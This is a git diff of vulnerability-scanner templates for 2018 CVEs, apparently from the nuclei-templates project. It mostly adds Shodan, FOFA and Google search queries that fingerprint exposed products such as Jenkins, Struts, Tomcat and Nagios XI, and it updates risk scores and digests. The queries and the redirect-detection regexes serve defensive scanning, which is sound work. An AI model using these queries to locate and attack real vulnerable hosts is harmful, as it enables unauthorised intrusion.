+# digest: 490a00463044022079634a20486dcf525b9d3cb71443762cdac4111b39fe9a6b3449dda9a8e890cc0220445f87f41680fdda13d31abfc6f3e0f0d50d4d2ea8bde289aedb0581313f4c1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml
index d240447832..30a24812d5 100644
--- a/http/cves/2018/CVE-2018-1000533.yaml
+++ b/http/cves/2018/CVE-2018-1000533.yaml
@@ -27,6 +27,7 @@ info:
max-request: 2
vendor: gitlist
product: gitlist
+ shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist"
tags: cve,cve2018,git,gitlist,vulhub,rce
http:
@@ -55,4 +56,4 @@ http:
- '(.*?)'
internal: true
part: body
-# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200f81ce3e13f27d57d6da8c69097e3f825ffe0487277515de76774c7a7694b022022100b7b600dafbc5c43e69246a4f582585a5384579f5a124b72709f0d7e74b67413f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml
index 009d5c0c00..9f8cdce89d 100644
--- a/http/cves/2018/CVE-2018-1000671.yaml
+++ b/http/cves/2018/CVE-2018-1000671.yaml
@@ -29,6 +29,7 @@ info:
vendor: sympa
product: sympa
shodan-query: http.html:"sympa"
+ fofa-query: body="sympa"
tags: cve,cve2018,redirect,sympa,debian
http:
@@ -41,4 +42,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f1b62b106b4c21342cb736b6e6a4348d2c7b41af9e60f58f06fb0a29d49e4df90221008faeb72dc507eae9f337d9244ac1b75c355da72c479a31bd223d05a0e2e564f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml
index dcc69a343c..7d3091378f 100644
--- a/http/cves/2018/CVE-2018-1000856.yaml
+++ b/http/cves/2018/CVE-2018-1000856.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 4.8
cve-id: CVE-2018-1000856
cwe-id: CWE-79
- epss-score: 0.00092
- epss-percentile: 0.38207
+ epss-score: 0.00069
+ epss-percentile: 0.30035
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -66,4 +66,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207d90ae1fac1b0db54f1d7a8e1f3eef2eb844417c05891f1804fb128088eb1d00022066c3f64a9240b442390e30adbf000b7b79f88529a42d94fdc60527fb2e78324a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml
index cd9da547aa..276a69b40d 100644
--- a/http/cves/2018/CVE-2018-1000861.yaml
+++ b/http/cves/2018/CVE-2018-1000861.yaml
@@ -20,13 +20,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-1000861
cwe-id: CWE-502
- epss-score: 0.9734
- epss-percentile: 0.99882
+ epss-score: 0.9732
+ epss-percentile: 0.99878
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
metadata:
max-request: 1
vendor: jenkins
product: jenkins
+ shodan-query: http.favicon.hash:81586312
+ fofa-query: icon_hash=81586312
tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins
http:
@@ -44,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b7546d4dccd4fa181fa09bb83e081a6989aead24521c6c0d70f5248899b2a45022100d4022a0e7bcef44ef127c8b6ff5c4b665921acb82e9765f06abe40226f8969a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml
index e170b2d02c..0a5d6fdb63 100644
--- a/http/cves/2018/CVE-2018-10141.yaml
+++ b/http/cves/2018/CVE-2018-10141.yaml
@@ -20,12 +20,14 @@ info:
cve-id: CVE-2018-10141
cwe-id: CWE-79
epss-score: 0.00126
- epss-percentile: 0.46296
+ epss-percentile: 0.47275
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: paloaltonetworks
product: pan-os
+ fofa-query: icon_hash="-631559155"
+ shodan-query: http.favicon.hash:"-631559155"
tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
http:
@@ -48,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bd38808d0d82c779bd0f9e6a95178a5ba15d9077aea8c861a459efcf42e0a10f022078e07f6c8c953b1fa0e4e74b9571886fce453b537e3a95cd9e23bbcb95b8d798:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml
index feadcb357a..5aeda05166 100644
--- a/http/cves/2018/CVE-2018-10230.yaml
+++ b/http/cves/2018/CVE-2018-10230.yaml
@@ -26,6 +26,7 @@ info:
max-request: 1
vendor: zend
product: zend_server
+ shodan-query: cpe:"cpe:2.3:a:zend:zend_server"
tags: cve,cve2018,xss,zend
http:
@@ -50,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205dfe914a909bd06826c5f95c78f072ebc7a003232260c8a72a600053849785ff0220190ab47deef14444724b423984e4a4b3555fda14bdbb101a1f79e98589c2b5f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml
index 5ddf231497..80d1969d83 100644
--- a/http/cves/2018/CVE-2018-10562.yaml
+++ b/http/cves/2018/CVE-2018-10562.yaml
@@ -14,13 +14,14 @@ info:
- https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
- https://nvd.nist.gov/vuln/detail/CVE-2018-10562
- https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
+ - https://github.com/ethicalhackeragnidhra/GPON
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-10562
cwe-id: CWE-78
- epss-score: 0.97441
- epss-percentile: 0.99945
+ epss-score: 0.97423
+ epss-percentile: 0.99934
cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -56,4 +57,4 @@ http:
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
-# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022076907511f4f625fb84a997087590fa36dac01d612d1802c6b579d54c508c623e02203ef2be0b835b4c686a29db3a4afcd4875d69783fc68a917690ddb802c2401758:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml
index 2d033c66f6..c9d9f40976 100644
--- a/http/cves/2018/CVE-2018-10735.yaml
+++ b/http/cves/2018/CVE-2018-10735.yaml
@@ -23,8 +23,9 @@ info:
vendor: nagios
product: nagios_xi
fofa-query: app="Nagios-XI"
+ shodan-query: http.title:"nagios xi"
+ google-query: intitle:"nagios xi"
tags: cve,cve2018,nagios,sqli
-
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
@@ -38,4 +39,4 @@ http:
part: body
words:
- "{{md5(num)}}"
-# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200c92d03da546dfaff637d87978a98fca7e7ad2a8730f1c69d01d1efe4d0a1553022100aa1ee875fe25ce4048f056bec89e298da5b0b1693920c7496c86380672682886:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml
index ac3bcd34f2..40290d66e0 100644
--- a/http/cves/2018/CVE-2018-10736.yaml
+++ b/http/cves/2018/CVE-2018-10736.yaml
@@ -15,8 +15,8 @@ info:
cvss-score: 7.2
cve-id: CVE-2018-10736
cwe-id: CWE-89
- epss-score: 0.00403
- epss-percentile: 0.7323
+ epss-score: 0.01861
+ epss-percentile: 0.88359
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -24,8 +24,9 @@ info:
vendor: nagios
product: nagios_xi
fofa-query: app="Nagios-XI"
+ shodan-query: http.title:"nagios xi"
+ google-query: intitle:"nagios xi"
tags: cve,cve2018,nagios,sqli
-
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
@@ -39,4 +40,4 @@ http:
part: body
words:
- "{{md5(num)}}"
-# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cd7e0f3fb866e6dbe44663017c33c95074875d8b777ee60e7589bdf239c9fda902203633af43f63f2beca4ba88660112dcdba36ad173ba8fcf87ab43b88a71d0f6be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml
index 816ec7a586..476167d0e2 100644
--- a/http/cves/2018/CVE-2018-10737.yaml
+++ b/http/cves/2018/CVE-2018-10737.yaml
@@ -23,8 +23,9 @@ info:
vendor: nagios
product: nagios_xi
fofa-query: app="Nagios-XI"
+ shodan-query: http.title:"nagios xi"
+ google-query: intitle:"nagios xi"
tags: cve,cve2018,nagios,sqli
-
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
@@ -42,4 +43,4 @@ http:
part: body
words:
- "{{md5(num)}}"
-# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202f133a4099b185a18cfefaa3ceb1a63edcd4505b939310fbe976681c8e6d0e80022100fdc8e91e5b09fe096ee74cd86983878a072ed1e682531d6b936180afec270de8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml
index 9c37617a2b..c8ebb8e65a 100644
--- a/http/cves/2018/CVE-2018-10738.yaml
+++ b/http/cves/2018/CVE-2018-10738.yaml
@@ -14,8 +14,8 @@ info:
cvss-score: 7.2
cve-id: CVE-2018-10738
cwe-id: CWE-89
- epss-score: 0.00403
- epss-percentile: 0.7323
+ epss-score: 0.01861
+ epss-percentile: 0.88359
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -23,8 +23,9 @@ info:
vendor: nagios
product: nagios_xi
fofa-query: app="Nagios-XI"
+ shodan-query: http.title:"nagios xi"
+ google-query: intitle:"nagios xi"
tags: cve,cve2018,nagios,sqli
-
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
@@ -41,4 +42,4 @@ http:
part: body
words:
- "{{md5(num)}}"
-# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022032ff5ae76fd4bafea18400182ea5d3e6b9e5917a60778bb68121d7724dd9a6eb022100cf064e5aaa2db867e5dd696a41135a985be141a222970604ad3f887173ec0db5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml
index c4a9a91a38..5a5b5ef2e9 100644
--- a/http/cves/2018/CVE-2018-10823.yaml
+++ b/http/cves/2018/CVE-2018-10823.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 8.8
cve-id: CVE-2018-10823
cwe-id: CWE-78
- epss-score: 0.96737
- epss-percentile: 0.99597
+ epss-score: 0.96759
+ epss-percentile: 0.9967
cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml
index 9e6acac4b7..439df260bd 100644
--- a/http/cves/2018/CVE-2018-10942.yaml
+++ b/http/cves/2018/CVE-2018-10942.yaml
@@ -11,11 +11,19 @@ info:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
- https://nvd.nist.gov/vuln/detail/CVE-2018-10942
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2018-10942
+ cwe-id: CWE-434
+ epss-score: 0.18241
+ epss-percentile: 0.96178
+ cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:*
metadata:
max-request: 8
+ vendor: attribute_wizard_project
+ product: attribute_wizard
+ framework: prestashop
tags: prestashop,attributewizardpro,intrusive,file-upload
-
variables:
filename: '{{rand_base(7, "abc")}}'
@@ -67,4 +75,4 @@ http:
group: 1
regex:
- '(.*?)\|\|\|\|'
-# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b5c0be9fdc84b3fd3d3c130d309b587ec77fd52be876838eddbba234cc28e715022100b42d341387c2ef8750f784db06da3e27e35d0cff6d77ae88c43ea4725c1ca3b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml
index a509b9736d..0bef67a5c0 100644
--- a/http/cves/2018/CVE-2018-10956.yaml
+++ b/http/cves/2018/CVE-2018-10956.yaml
@@ -21,14 +21,16 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
- epss-score: 0.57917
- epss-percentile: 0.97652
+ epss-score: 0.54195
+ epss-percentile: 0.97627
cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ipconfigure
product: orchid_core_vms
shodan-query: http.title:"Orchid Core VMS"
+ fofa-query: title="orchid core vms"
+ google-query: intitle:"orchid core vms"
tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure
http:
@@ -45,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022002c0da9e8011d65dab80c630bf30cb61029cb0fc68d1a0b5b7de1f11b65ba50b022100d10b2577aae04e1cb2447339fb423e147328096fafe2e7dfa63a3c87b876f4d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml
index dd9501ca2f..efc806c9f4 100644
--- a/http/cves/2018/CVE-2018-11227.yaml
+++ b/http/cves/2018/CVE-2018-11227.yaml
@@ -30,6 +30,7 @@ info:
vendor: monstra
product: monstra_cms
shodan-query: http.favicon.hash:419828698
+ fofa-query: icon_hash=419828698
tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra
http:
@@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e9e55724df8749ace8f579f6c441325aed843527785b06dc7575d60426297d970220098c8c73fed3d1499735eb40da07fabb36db006d2d8ecb643cb55996bc35aa28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml
index 2787cb03f5..ccdd6b9943 100644
--- a/http/cves/2018/CVE-2018-11409.yaml
+++ b/http/cves/2018/CVE-2018-11409.yaml
@@ -27,6 +27,9 @@ info:
max-request: 2
vendor: splunk
product: splunk
+ shodan-query: http.title:"login - splunk"
+ fofa-query: title="login - splunk"
+ google-query: intitle:"login - splunk"
tags: cve,cve2018,edb,splunk
http:
@@ -44,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cf46cae11d86cd1de5f9dadb6eaacc3a59275c483617d1b09f441671815032620220701cf5a3bee3b755f16c7a9cd42976913debedf9914a004e5acc5ab96c9820ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml
index b812c09865..c2cf62f4c7 100644
--- a/http/cves/2018/CVE-2018-11473.yaml
+++ b/http/cves/2018/CVE-2018-11473.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-11473
cwe-id: CWE-79
- epss-score: 0.00097
- epss-percentile: 0.39534
+ epss-score: 0.001
+ epss-percentile: 0.4118
cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
metadata:
verified: true
@@ -29,6 +29,7 @@ info:
vendor: monstra
product: monstra
shodan-query: http.favicon.hash:419828698
+ fofa-query: icon_hash=419828698
tags: cve,cve2018,xss,mostra,mostracms,cms,monstra
http:
@@ -70,4 +71,4 @@ http:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true
part: body
-# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022036c1c6320032b7d766da8547f80ca65da333066602f3c266752775429737766e022100df63b38dfd53ec3807a099db7b983469085a94bc866637ce7a4da3a1f8c7137a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml
index 5deb50899a..4975a82ea5 100644
--- a/http/cves/2018/CVE-2018-11709.yaml
+++ b/http/cves/2018/CVE-2018-11709.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-11709
cwe-id: CWE-79
- epss-score: 0.00175
- epss-percentile: 0.53725
+ epss-score: 0.00183
+ epss-percentile: 0.55455
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207421366c244f2a469b78e683d33433ea6d7c8268abf6e0e8090bbfb449d240d202203fdb385d1e1838f118286e940d02d935d99b18bc9ab0657fd3edcf1210203932:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml
index 4146114bce..2b8a43c127 100644
--- a/http/cves/2018/CVE-2018-11759.yaml
+++ b/http/cves/2018/CVE-2018-11759.yaml
@@ -29,6 +29,8 @@ info:
vendor: apache
product: tomcat_jk_connector
shodan-query: title:"Apache Tomcat"
+ fofa-query: title="apache tomcat"
+ google-query: intitle:"apache tomcat"
tags: cve2018,cve,apache,tomcat,httpd,mod-jk
http:
@@ -46,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100938ac8228345eddd038c98eda80c1dd2c91c011b112fd03901c57fa214b320ae02210087ae996c5447b94a35b1756c4b5fa32348fcb342d1182163594151eac3b250b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml
index 540b9f8c3d..7989de9eaa 100644
--- a/http/cves/2018/CVE-2018-11776.yaml
+++ b/http/cves/2018/CVE-2018-11776.yaml
@@ -22,12 +22,15 @@ info:
cve-id: CVE-2018-11776
cwe-id: CWE-20
epss-score: 0.97517
- epss-percentile: 0.99985
+ epss-percentile: 0.99987
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2018,packetstorm,apache,rce,struts,kev
http:
@@ -44,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eaabc7db1807fc929001ebb7e618de3e40c1278290fd8ebf70728eb103cf8c2402203e66b8cb08ccd31c52735f7647ad71582aa2bf25aa797c7fd2c1b7387c995f83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml
index a39a136872..fd94e8bf70 100644
--- a/http/cves/2018/CVE-2018-11784.yaml
+++ b/http/cves/2018/CVE-2018-11784.yaml
@@ -21,14 +21,16 @@ info:
cvss-score: 4.3
cve-id: CVE-2018-11784
cwe-id: CWE-601
- epss-score: 0.83718
- epss-percentile: 0.98183
+ epss-score: 0.79069
+ epss-percentile: 0.9827
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
+ fofa-query: body="apache tomcat"
+ google-query: intitle:"apache tomcat"
tags: cve,cve2018,packetstorm,tomcat,redirect,apache
http:
@@ -47,4 +49,4 @@ http:
negative: true
status:
- 404
-# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ede843a93cd7c543ab76b7e16334cef004e6cb38d973d677b0e973ca732b6d0c022059ab20c40bda233e9cbcb62f029375e1ab0ab8d446fb593bd171dac749c4cb48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml
index d054420772..20be64b068 100644
--- a/http/cves/2018/CVE-2018-12031.yaml
+++ b/http/cves/2018/CVE-2018-12031.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-12031
cwe-id: CWE-22
- epss-score: 0.00725
- epss-percentile: 0.80248
+ epss-score: 0.02759
+ epss-percentile: 0.90576
cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -47,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fa5f6c95e56ff7e46e8bb58d0cf8c30e0a6788c3a1378618619c2e0a8c7ae11902201bd725976214247dc0fecb41fc5b6e3213a728cbee903a11d4945a7de4f4404d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml
index 917c709de5..e029096e0d 100644
--- a/http/cves/2018/CVE-2018-12296.yaml
+++ b/http/cves/2018/CVE-2018-12296.yaml
@@ -25,6 +25,9 @@ info:
max-request: 1
vendor: seagate
product: nas_os
+ shodan-query: http.title:"seagate nas - seagate"
+ fofa-query: title="seagate nas - seagate"
+ google-query: intitle:"seagate nas - seagate"
tags: cve,cve2018,seagate,nasos,disclosure,unauth
http:
@@ -48,4 +51,4 @@ http:
regex:
- '"version": "([0-9.]+)"'
part: body
-# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eea6124ab2717f89f34103874e7c2f3d232178d78b14c8c4c93c2358076dd57702207a7f9ab3aae93592eb2adfbd00c2e38e3632f23fa3aed618d162a876c7ce255b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml
index 94384ca163..2a6238d209 100644
--- a/http/cves/2018/CVE-2018-12300.yaml
+++ b/http/cves/2018/CVE-2018-12300.yaml
@@ -24,6 +24,9 @@ info:
max-request: 1
vendor: seagate
product: nas_os
+ shodan-query: http.title:"seagate nas - seagate"
+ fofa-query: title="seagate nas - seagate"
+ google-query: intitle:"seagate nas - seagate"
tags: cve2018,cve,redirect,seagate,nasos
http:
@@ -36,4 +39,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
